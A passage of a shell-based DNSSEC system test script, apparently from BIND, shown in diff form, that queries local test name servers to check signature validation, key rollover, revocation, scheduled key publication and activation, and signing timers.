dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking multi-stage positive validation NSEC3/NSEC ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.secure.nsec3.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.secure.nsec3.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking multi-stage positive validation NSEC3/NSEC3 ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.nsec3.nsec3.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.nsec3.nsec3.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking multi-stage positive validation NSEC3/OPTOUT ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.optout.nsec3.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.optout.nsec3.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking multi-stage positive validation OPTOUT/NSEC ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.secure.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.secure.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking multi-stage positive validation OPTOUT/NSEC3 ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.nsec3.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.nsec3.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking multi-stage positive validation OPTOUT/OPTOUT ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.optout.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.optout.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking empty NODATA OPTOUT ($n)" +ret=0 +$DIG $DIGOPTS +noauth empty.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth empty.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +#grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Check the insecure.secure.example domain (insecurity proof) + +echo_i "checking 2-server insecurity proof ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.insecure.secure.example. @10.53.0.2 a \ + > dig.out.ns2.test$n || ret=1 +$DIG $DIGOPTS +noauth a.insecure.secure.example. @10.53.0.4 a \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Check a negative response in insecure.secure.example + +echo_i "checking 2-server insecurity proof with a negative answer ($n)" +ret=0 +$DIG $DIGOPTS q.insecure.secure.example. @10.53.0.2 a > dig.out.ns2.test$n \ + || ret=1 +$DIG $DIGOPTS q.insecure.secure.example. @10.53.0.4 a > dig.out.ns4.test$n \ + || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking security root query ($n)" +ret=0 +$DIG $DIGOPTS . @10.53.0.4 key > dig.out.ns4.test$n || ret=1 +grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking positive validation RSASHA256 NSEC ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.rsasha256.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.rsasha256.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking positive validation RSASHA512 NSEC ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.rsasha512.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.rsasha512.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that positive validation in a privately secure zone works ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.private.secure.example. a @10.53.0.2 \ + > dig.out.ns2.test$n || ret=1 +$DIG $DIGOPTS +noauth a.private.secure.example. a @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that negative validation in a privately secure zone works ($n)" +ret=0 +$DIG $DIGOPTS +noauth q.private.secure.example. a @10.53.0.2 \ + > dig.out.ns2.test$n || ret=1 +$DIG $DIGOPTS +noauth q.private.secure.example. a @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking privately secure to nxdomain works ($n)" +ret=0 +$DIG $DIGOPTS +noauth private2secure-nxdomain.private.secure.example. SOA @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Try validating with a revoked trusted key. +# This should fail. + +echo_i "checking that validation returns insecure due to revoked trusted key ($n)" +ret=0 +$DIG $DIGOPTS example. soa @10.53.0.5 > dig.out.ns5.test$n || ret=1 +grep "flags:.*; QUERY" dig.out.ns5.test$n > /dev/null || ret=1 +grep "flags:.* ad.*; QUERY" dig.out.ns5.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that revoked key is present ($n)" +ret=0 +id=$(cat rev.key) +$DIG $DIGOPTS +multi dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep '; key id = '"$id"'$' dig.out.ns1.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that revoked key self-signs ($n)" +ret=0 +id=$(cat rev.key) +$DIG $DIGOPTS dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep 'RRSIG.*'" $id "'\. ' dig.out.ns1.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking for unpublished key ($n)" +ret=0 +id=$(keyfile_to_key_id "$(cat unpub.key)") +$DIG $DIGOPTS +multi dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep '; key id = '"$id"'$' dig.out.ns1.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking for activated but unpublished key ($n)" +ret=0 +id=$(keyfile_to_key_id "$(cat activate-now-publish-1day.key)") +$DIG $DIGOPTS +multi dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep '; key id = '"$id"'$' dig.out.ns1.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that standby key does not sign records ($n)" +ret=0 +id=$(keyfile_to_key_id "$(cat standby.key)") +$DIG $DIGOPTS dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep 'RRSIG.*'" $id "'\. ' dig.out.ns1.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that deactivated key does not sign records ($n)" +ret=0 +id=$(keyfile_to_key_id "$(cat inact.key)") +$DIG $DIGOPTS dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep 'RRSIG.*'" $id "'\. ' dig.out.ns1.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking insertion of public-only key ($n)" +ret=0 +id=$(keyfile_to_key_id "$(cat nopriv.key)") +file="ns1/$(cat nopriv.key).key" +keydata=$(grep DNSKEY $file) +$NSUPDATE > /dev/null 2>&1 <<END || status=1 +server 10.53.0.1 ${PORT} +zone . +ttl 3600 +update add $keydata +send +END +sleep 1 +$DIG $DIGOPTS dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep 'RRSIG.*'" $id "'\. ' dig.out.ns1.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking key deletion ($n)" +ret=0 +id=$(keyfile_to_key_id "$(cat del.key)") +$DIG $DIGOPTS +multi dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep '; key id = '"$id"'$' dig.out.ns1.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking secure-to-insecure transition, nsupdate ($n)" +ret=0 +$NSUPDATE > /dev/null 2>&1 <<END || status=1 +server 10.53.0.3 ${PORT} +zone secure-to-insecure.example +update delete secure-to-insecure.example dnskey +send +END +for i in 0 1 2 3 4 5 6 7 8 9; do + ret=0 + $DIG $DIGOPTS axfr secure-to-insecure.example @10.53.0.3 > dig.out.ns3.test$n || ret=1 + grep -E '(RRSIG|DNSKEY|NSEC)' dig.out.ns3.test$n > /dev/null && ret=1 + [ $ret -eq 0 ] && break + echo_i "waiting ... ($i)" + sleep 2 +done +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking secure-to-insecure transition, scheduled ($n)" +ret=0 +file="ns3/$(cat del1.key).key" +$SETTIME -I now -D now $file > settime.out.test$n.1 || ret=1 +file="ns3/$(cat del2.key).key" +$SETTIME -I now -D now $file > settime.out.test$n.2 || ret=1 +($RNDCCMD 10.53.0.3 sign secure-to-insecure2.example. 2>&1 | sed 's/^/ns3 /' | cat_i) || ret=1 +for i in 0 1 2 3 4 5 6 7 8 9; do + ret=0 + $DIG $DIGOPTS axfr secure-to-insecure2.example @10.53.0.3 > dig.out.ns3.test$n || ret=1 + grep -E '(RRSIG|DNSKEY|NSEC3)' dig.out.ns3.test$n > /dev/null && ret=1 + [ $ret -eq 0 ] && break + echo_i "waiting ... ($i)" + sleep 2 +done +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking jitter in a newly signed NSEC3 zone ($n)" +ret=0 +# Use DNS UPDATE to add an NSEC3PARAM record into the zone. +$NSUPDATE > nsupdate.out.test$n 2>&1 <<END || ret=1 +server 10.53.0.3 ${PORT} +zone jitter.nsec3.example. +update add jitter.nsec3.example. 3600 NSEC3PARAM 1 0 10 BEEF +send +END +[ $ret != 0 ] && echo_i "error: dynamic update add NSEC3PARAM failed" +# Create DNSSEC keys in the zone directory. +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -K ns3 jitter.nsec3.example > /dev/null +# Trigger zone signing. +($RNDCCMD 10.53.0.3 sign jitter.nsec3.example. 2>&1 | sed 's/^/ns3 /' | cat_i) || ret=1 +# Wait until zone has been signed. +check_if_nsec3param_exists() { + $DIG $DIGOPTS NSEC3PARAM jitter.nsec3.example @10.53.0.3 > dig.out.ns3.1.test$n || return 1 + grep -q "^jitter\.nsec3\.example\..*NSEC3PARAM" dig.out.ns3.1.test$n || return 1 +} +retry_quiet 40 check_if_nsec3param_exists || { + echo_i "error: NSEC3PARAM not present yet" + ret=1 +} +$DIG $DIGOPTS AXFR jitter.nsec3.example @10.53.0.3 > dig.out.ns3.2.test$n || ret=1 +# Check jitter distribution. +checkjitter dig.out.ns3.2.test$n || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that serial number and RRSIGs are both updated (rt21045) ($n)" +ret=0 +oldserial=$($DIG $DIGOPTS +short soa prepub.example @10.53.0.3 | awk '$0 !~ /SOA/ {print $3}') +oldinception=$($DIG $DIGOPTS +short soa prepub.example @10.53.0.3 | awk '/SOA/ {print $6}' | sort -u) + +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -K ns3 -P 0 -A +6d -I +38d -D +45d prepub.example > /dev/null + +($RNDCCMD 10.53.0.3 sign prepub.example 2>&1 | sed 's/^/ns1 /' | cat_i) || ret=1 +newserial=$oldserial +try=0 +while [ $oldserial -eq $newserial -a $try -lt 42 ] +do + newserial=$($DIG $DIGOPTS +short soa prepub.example @10.53.0.3 | + awk '$0 !~ /SOA/ {print $3}') + sleep 1 + try=$((try + 1)) +done +newinception=$($DIG $DIGOPTS +short soa prepub.example @10.53.0.3 | awk '/SOA/ {print $6}' | sort -u) +#echo "$oldserial : $newserial" +#echo "$oldinception : $newinception" + +[ "$oldserial" = "$newserial" ] && ret=1 +[ "$oldinception" = "$newinception" ] && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "preparing to test key change corner cases" +echo_i "removing a private key file" +file="ns1/$(cat vanishing.key).private" +rm -f $file + +echo_i "preparing ZSK roll" +starttime=$($PERL -e 'print time(), "\n";') +oldfile=$(cat active.key) +oldid=$(keyfile_to_key_id "$(cat active.key)") +newfile=$(cat standby.key) +newid=$(keyfile_to_key_id "$(cat standby.key)") +$SETTIME -K ns1 -I now+2s -D now+25 $oldfile > settime.out.test$n.1 || ret=1 +$SETTIME -K ns1 -i 0 -S $oldfile $newfile > settime.out.test$n.2 || ret=1 + +# note previous zone serial number +oldserial=$($DIG $DIGOPTS +short soa . @10.53.0.1 | awk '{print $3}') + +($RNDCCMD 10.53.0.1 loadkeys . 2>&1 | sed 's/^/ns1 /' | cat_i) || ret=1 +sleep 4 + +echo_i "revoking key to duplicated key ID" +$SETTIME -R now -K ns2 Kbar.+013+59973.key > settime.out.test$n.3 || ret=1 + +($RNDCCMD 10.53.0.2 loadkeys bar. 2>&1 | sed 's/^/ns2 /' | cat_i) || ret=1 + +echo_i "waiting for changes to take effect" +sleep 5 + +echo_i "checking former standby key $newid is now active ($n)" +ret=0 +$DIG $DIGOPTS dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep 'RRSIG.*'" $newid "'\. ' dig.out.ns1.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking former standby key has only signed incrementally ($n)" +ret=0 +$DIG $DIGOPTS txt . @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep 'RRSIG.*'" $newid "'\. ' dig.out.ns1.test$n > /dev/null && ret=1 +grep 'RRSIG.*'" $oldid "'\. ' dig.out.ns1.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that signing records have been marked as complete ($n)" +ret=0 +checkprivate . 10.53.0.1 || ret=1 +checkprivate bar 10.53.0.2 || ret=1 +checkprivate example 10.53.0.2 || ret=1 +checkprivate private.secure.example 10.53.0.3 || ret=1 +checkprivate nsec3.example 10.53.0.3 || ret=1 +checkprivate nsec3.nsec3.example 10.53.0.3 || ret=1 +checkprivate nsec3.optout.example 10.53.0.3 || ret=1 +checkprivate nsec3-to-nsec.example 10.53.0.3 || ret=1 +if $SHELL ../testcrypto.sh -q RSASHA1 +then + checkprivate nsec-only.example 10.53.0.3 || ret=1 +fi +checkprivate oldsigs.example 10.53.0.3 || ret=1 +checkprivate optout.example 10.53.0.3 || ret=1 +checkprivate optout.nsec3.example 10.53.0.3 || ret=1 +checkprivate optout.optout.example 10.53.0.3 || ret=1 +checkprivate prepub.example 10.53.0.3 1 || ret=1 +checkprivate rsasha256.example 10.53.0.3 || ret=1 +checkprivate rsasha512.example 10.53.0.3 || ret=1 +checkprivate secure.example 10.53.0.3 || ret=1 +checkprivate secure.nsec3.example 10.53.0.3 || ret=1 +checkprivate secure.optout.example 10.53.0.3 || ret=1 +checkprivate secure-to-insecure2.example 10.53.0.3 || ret=1 +checkprivate secure-to-insecure.example 10.53.0.3 || ret=1 +checkprivate ttl1.example 10.53.0.3 || ret=1 +checkprivate ttl2.example 10.53.0.3 || ret=1 +checkprivate ttl3.example 10.53.0.3 || ret=1 +checkprivate ttl4.example 10.53.0.3 || ret=1 +n=$((n + 1)) +status=$((status + ret)) + +echo_i "forcing full sign" +($RNDCCMD 10.53.0.1 sign . 2>&1 | sed 's/^/ns1 /' | cat_i) || ret=1 + +echo_i "waiting for change to take effect" +sleep 5 + +echo_i "checking former standby key has now signed fully ($n)" +ret=0 +$DIG $DIGOPTS txt . @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep 'RRSIG.*'" $newid "'\. ' dig.out.ns1.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking SOA serial number has been incremented ($n)" +ret=0 +newserial=$($DIG $DIGOPTS +short soa . @10.53.0.1 | awk '{print $3}') +[ "$newserial" != "$oldserial" ] || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking delayed key publication/activation ($n)" +ret=0 +zsk=$(cat delayzsk.key) +ksk=$(cat delayksk.key) +# publication and activation times should be unset +$SETTIME -K ns3 -pA -pP $zsk > settime.out.test$n.zsk || ret=1 +grep -v UNSET settime.out.test$n.zsk >/dev/null && ret=1 +$SETTIME -K ns3 -pA -pP $ksk > settime.out.test$n.ksk || ret=1 +grep -v UNSET settime.out.test$n.ksk >/dev/null && ret=1 +$DIG $DIGOPTS +noall +answer dnskey delay.example. @10.53.0.3 > dig.out.ns3.test$n || ret=1 +# DNSKEY not expected: +awk 'BEGIN {r=1} $4=="DNSKEY" {r=0} END {exit r}' dig.out.ns3.test$n && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking scheduled key publication, not activation ($n)" +ret=0 +# Ensure initial zone is loaded. +wait_for_notifies "delay.example" "ns3" || ret=1 +$SETTIME -K ns3 -P now+3s -A none $zsk > settime.out.test$n.zsk || ret=1 +$SETTIME -K ns3 -P now+3s -A none $ksk > settime.out.test$n.ksk || ret=1 +($RNDCCMD 10.53.0.3 loadkeys delay.example. 2>&1 | sed 's/^/ns2 /' | cat_i) || ret=1 +echo_i "waiting for changes to take effect" +sleep 3 +wait_for_notifies "delay.example" "ns3" || ret=1 + +$DIG $DIGOPTS +noall +answer dnskey delay.example. @10.53.0.3 > dig.out.ns3.test$n || ret=1 +# DNSKEY expected: +awk 'BEGIN {r=1} $4=="DNSKEY" {r=0} END {exit r}' dig.out.ns3.test$n || ret=1 +# RRSIG not expected: +awk 'BEGIN {r=1} $4=="RRSIG" {r=0} END {exit r}' dig.out.ns3.test$n && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking scheduled key activation ($n)" +ret=0 +$SETTIME -K ns3 -A now+3s $zsk > settime.out.test$n.zsk || ret=1 +$SETTIME -K ns3 -A now+3s $ksk > settime.out.test$n.ksk || ret=1 +($RNDCCMD 10.53.0.3 loadkeys delay.example. 2>&1 | sed 's/^/ns2 /' | cat_i) || ret=1 +echo_i "waiting for changes to take effect" +sleep 3 +wait_for_log 10 "add delay\.example\..*NSEC.a\.delay\.example\. NS SOA RRSIG NSEC DNSKEY" ns3/named.run +check_is_signed() { + $DIG $DIGOPTS +noall +answer dnskey delay.example. @10.53.0.3 > dig.out.ns3.1.test$n || return 1 + # DNSKEY expected: + awk 'BEGIN {r=1} $4=="DNSKEY" {r=0} END {exit r}' dig.out.ns3.1.test$n || return 1 + # RRSIG expected: + awk 'BEGIN {r=1} $4=="RRSIG" {r=0} END {exit r}' dig.out.ns3.1.test$n || return 1 + $DIG $DIGOPTS +noall +answer a a.delay.example. @10.53.0.3 > dig.out.ns3.2.test$n || return 1 + # A expected: + awk 'BEGIN {r=1} $4=="A" {r=0} END {exit r}' dig.out.ns3.2.test$n || return 1 + # RRSIG expected: + awk 'BEGIN {r=1} $4=="RRSIG" {r=0} END {exit r}' dig.out.ns3.2.test$n || return 1 + return 0 +} +retry_quiet 5 check_is_signed || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking former active key was removed ($n)" +# +# Work out how long we need to sleep. Allow 4 seconds for the records +# to be removed. +# +now=$($PERL -e 'print time(), "\n";') +sleep=$((starttime + 29 - now)) +case $sleep in +-*|0);; +*) echo_i "waiting for timer to have activated"; sleep $sleep;; +esac +ret=0 +$DIG $DIGOPTS +multi dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep '; key id = '"$oldid"'$' dig.out.ns1.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking private key file removal caused no immediate harm ($n)" +ret=0 +id=$(keyfile_to_key_id "$(cat vanishing.key)") +$DIG $DIGOPTS dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep 'RRSIG.*'" $id "'\. ' dig.out.ns1.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking revoked key with duplicate key ID ($n)" +ret=0 +id=59973 +rid=60101 +$DIG $DIGOPTS +multi dnskey bar @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep '; key id = '"$id"'$' dig.out.ns2.test$n > /dev/null && ret=1 +keys=$(grep '; key id = '"$rid"'$' dig.out.ns2.test$n | wc -l) +test $keys -eq 2 || ret=1 +$DIG $DIGOPTS dnskey bar @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking key event timers are always set ($n)" +ret=0 +# this is a regression test for a bug in which the next key event could +# be scheduled for the present moment, and then never fire. check for +# visible evidence of this error in the logs: +awk '/next key event/ {if ($1 == $8 && $2 == $9) exit 1}' */named.run || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# this confirms that key events are never scheduled more than +# 'dnssec-loadkeys-interval' minutes in the future, and that the +# event scheduled is within 10 seconds of expected interval. +check_interval () { + awk '/next key event/ {print $2 ":" $9}' $1/named.run | + sed -e 's/\.//g' -e 's/:0\{1,4\}/:/g' | + awk -F: ' + { + x = ($6+ $5*60000 + $4*3600000) - ($3+ $2*60000 + $1*3600000); + # abs(x) < 1000 ms treat as 'now' + if (x < 1000 && x > -1000) + x = 0; + # convert to seconds + x = x/1000; + # handle end of day roll over + if (x < 0) + x = x + 24*3600; + # handle log timestamp being a few milliseconds later + if (x != int(x)) + x = int(x + 1); + if (int(x) > int(interval)) + exit (1); + } + END { if (int(x) > int(interval) || int(x) < int(interval-10)) exit(1) }' interval=$2 + return $? +} + +echo_i "checking automatic key reloading interval ($n)" +ret=0 +check_interval ns1 3600 || ret=1 +check_interval ns2 1800 || ret=1 +check_interval ns3 600 || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking for key reloading loops ($n)" +ret=0 +# every key event should schedule a successor, so these should be equal +rekey_calls=$(grep "reconfiguring zone keys" ns*/named.run | wc -l) +rekey_events=$(grep "next key event" ns*/named.run | wc -l) +[ "$rekey_calls" = "$rekey_events" ] || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "forcing full sign with unreadable keys ($n)" +ret=0 +chmod 0 ns1/K.+*+*.key ns1/K.+*+*.private || ret=1 +($RNDCCMD 10.53.0.1 sign . 2>&1 | sed 's/^/ns1 /' | cat_i) || ret=1 +$DIG $DIGOPTS . @10.53.0.1 dnskey > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "test turning on auto-dnssec during reconfig ($n)" +ret=0 +# first create a zone that doesn't have auto-dnssec +($RNDCCMD 10.53.0.3 addzone reconf.example '{ type primary; file "reconf.example.db"; };' 2>&1 | sed 's/^/ns3 /' | cat_i) || ret=1 +rekey_calls=$(grep "zone reconf.example.*next key event" ns3/named.run | wc -l) +[ "$rekey_calls" -eq 0 ] || ret=1 +# ...then we add auto-dnssec and reconfigure +($RNDCCMD 10.53.0.3 modzone reconf.example '{ type primary; file "reconf.example.db"; allow-update { any; }; auto-dnssec maintain; };' 2>&1 | sed 's/^/ns3 /' | cat_i) || ret=1 +rndc_reconfig ns3 10.53.0.3 +for i in 0 1 2 3 4 5 6 7 8 9; do + lret=0 + rekey_calls=$(grep "zone reconf.example.*next key event" ns3/named.run | wc -l) + [ "$rekey_calls" -gt 0 ] || lret=1 + if [ "$lret" -eq 0 ]; then break; fi + echo_i "waiting ... ($i)" + sleep 1 +done +n=$((n + 1)) +if [ "$lret" != 0 ]; then ret=$lret; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "test CDS and CDNSKEY auto generation ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 sync.example cds > dig.out.ns3.cdstest$n +$DIG $DIGOPTS @10.53.0.3 sync.example cdnskey > dig.out.ns3.cdnskeytest$n +grep -i 